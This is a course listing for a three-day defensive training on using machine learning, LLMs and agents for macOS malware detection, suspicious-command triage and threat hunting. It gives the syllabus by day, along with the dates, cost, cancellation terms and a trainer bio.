AI for Mac Security

A hands-on course on using machine learning, LLMs, and agents for macOS security.

Training overview

This training shows you how to use machine learning (ML) and AI for macOS malware triage, process analysis, and investigation. While this training will not turn you into a full ML engineer, it will give you an understanding of how ML and AI work and how you can use them to solve Mac security challenges.Over three days, we'll cover topics of supervised machine learning, unsupervised machine learning, and generative AI. We start with data collection, labels, features, model testing, and model failure. From there, we build a Mac malware detector and a suspicious command detector. We then use LLMs, retrieval, tool calling, MCP, and agent tools to summarize command activity, enrich alerts, and draft investigation notes. Finally, we'll use long running agents to threat hunt against macOS.The course is designed for students who know basic macOS security concepts but are new to ML, plus students who have seen some ML and want methods for malware detection, command analysis, and LLM-assisted triage. More than half of our time will be spend doing hands-on lab work and will require some proficiency with Python.

When

November 15-17, 2026

Where

Hyatt Regency Maui
(the #OBTS conference venue).


Details

Day 1: Build a Mac malware detector

Goal: Use Mach-O file samples to train and test a Mac malware detector.Learning objectives
- Understand how to build a supervised detector for a security problem.
- Pull fields from Mach-O files and related metadata.
- Train a random forest classifier and explain its results in defender terms.
- Use model mistakes to improve data quality, features, and evaluation.
Topic overview
- What supervised ML can and cannot solve in malware detection.
- Why the question, label, and evaluation method matter more than the algorithm.
- Mach-O structure, load commands, segments, sections, imports, and architecture.
- Code signing, entitlements, notarization signals, developer identifiers, and file paths.
- Persistence locations and other high-signal macOS context.
- Building a dataset from malware samples and repeatable collection steps.
- Handling duplicates, missing values, architecture splits, and noisy labels.
- Train, validation, and test splits that reduce polluting results.
- Turning Mach-O metadata and file context into columns a model can use.
- Keeping features clear enough that a defender can explain them.
- Random forests as a baseline model.
- Hyperparameters, class imbalance, and feature importance.
- Precision, recall, F1, confusion matrices, thresholds, and alert volume.
- Reviewing false positives and false negatives as a security exercise.
- Optional topics:
- N-gram features from disassembly or opcode sequences.
- A short neural network demo to introduce deep learning ideas that appear again in embeddings and LLMs.

Day 2: Find suspicious commands without labels

Goal: Find suspicious command behavior when you do not already know which commands are bad, then use LLMs to review the results with evidence.Learning objectives
- Turn command executions and process context into model input.
- Use TF-IDF, embeddings, distance, and anomaly scores to rank commands for review.
- Explain why unsupervised methods help with discovery but still need human review.
- Use LLMs to summarize and classify command behavior without hiding the underlying evidence.
- Build a script that sends command data to the LLM and returns a structured result.
Topic overview
- Process lineage, executable path, command line, user, parent process, working directory, and timestamp.
- What defenders can observe from Endpoint Security, EDR, Unified Logs, and SIEM pipelines.
- Normalization problems in real command data.
- Command lines, paths, flags, URLs, bundle identifiers, and developer IDs.
- Tokenization choices for shell commands and process arguments.
- TF-IDF as a clear baseline for turning commands into model input.
- Isolation forest for unusual commands and process activity.
- Thresholds, contamination settings, and analyst review loops.
- Why outliers are not automatically malicious.
- Semantic similarity for finding commands that look related.
- Comparing TF-IDF distance and embedding distance.
- Grouping related commands for review.
- Sending clear text that describes command executions and context.
- Getting a consistent triage result with risk, reasons, evidence, and follow-up questions.
- Keeping prompts grounded in observed fields rather than unsupported guesses.
- Retrieving local runbooks, ATT&CK notes, analyst notes, or known-good examples.
- Using retrieved notes to improve command triage while preserving source attribution.
- Failure modes: stale context, prompt injection, overbroad retrieval, and unreviewed summaries.

Day 3: Use agents for security work

Goal: Build agents for security analysis, then learn how agent apps can inspect files, run commands, and retry after errors.Learning objectives
- Distinguish simple LLM calls, tool-using agents, MCP-connected tools, and long-running agent apps.
- Build agents that use tools for enrichment and investigation while preserving evidence.
- Test agents with realistic examples before trusting them in a security task.
- Use MCP to connect agents to external tools such as enrichment, retrieval, or SIEM queries.
- Use project instructions, skills, and repo context to guide agent tools in security work.
Topic overview
- When an agent with tools is justified and when a single structured LLM call is better.
- Tool definitions, typed inputs, typed outputs, and error handling.
- Structured findings tied to source evidence.
- Tool boundaries, approvals, audit logs, and traceability.
- Prompt injection risks when agents read untrusted content.
- Rules that stop agents from leaking data, changing things, calling outside services, or spending too much.
- Building a small test set of alerts, command executions, and expected agent outputs.
- Checking whether the agent used the right tools, preserved evidence, and avoided unsupported claims.
- Running simple regression checks after changing prompts, tools, models, or retrieved context.
- MCP hosts, clients, servers, tools, and resources.
- Connecting an agent to enrichment, retrieval, or SIEM queries.
- Comparing built-in Python tools with MCP-provided tools.
- Agent handoffs, manager-style delegation, and specialized agents.
- Keeping the agent run simple enough to debug.
- Designing agent runs that produce evidence, not just summaries.
- Codex, Claude Code, and similar systems as tools that can inspect a repo, edit files, run commands, and retry after errors.
- Terminal access, repository inspection, file edits, test execution, and iterative repair.
- Project instructions such as AGENTS.md.
- Reusable skills, local context, and documented steps.
- How agent apps differ from building an agent directly with an SDK.

Cost

$2,000

Cost does not include a conference ticket. Please also register here!

Cancellation:
Cancellations up to a month before the training (Oct. 15 2026), will be 100% refunded (minus any payment processing fees).
Cancellations less than a month before will be refunded at half rate (minus any payment processing fees).

Required setup

Macbook (Apple Silicon preferred)
Prior to training start, you will receive an email with additional details on access to the private Github repository.


About the trainer

Dr. Kimo Bumanglag is a Member of Technical Staff at OpenAI focused on threat hunting and intelligence.He also serves as an adjunct lecturer at Johns Hopkins University, where he’s committed to making complex cybersecurity topics accessible and mentoring the next generation of security professionals. In addition, he spent years training people for the NSA, US Marine Corps, and US Air Force in offensive and defensive cyber operations.


© All rights reserved.